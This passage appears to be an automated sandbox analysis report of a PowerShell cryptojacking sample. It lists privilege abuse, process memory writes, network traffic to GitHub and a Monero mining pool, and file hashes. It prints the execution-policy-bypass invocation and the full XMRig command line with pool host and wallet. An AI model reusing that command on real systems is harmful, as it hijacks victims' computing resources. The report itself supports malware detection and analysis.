| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2620 wrote to memory of 3164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2620 wrote to memory of 3164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3772,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4016 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1008,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=3884 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.246.116.51.in-addr.arpa | udp |
Files
memory/2620-0-0x00007FF992653000-0x00007FF992655000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgmmjrar.ftt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |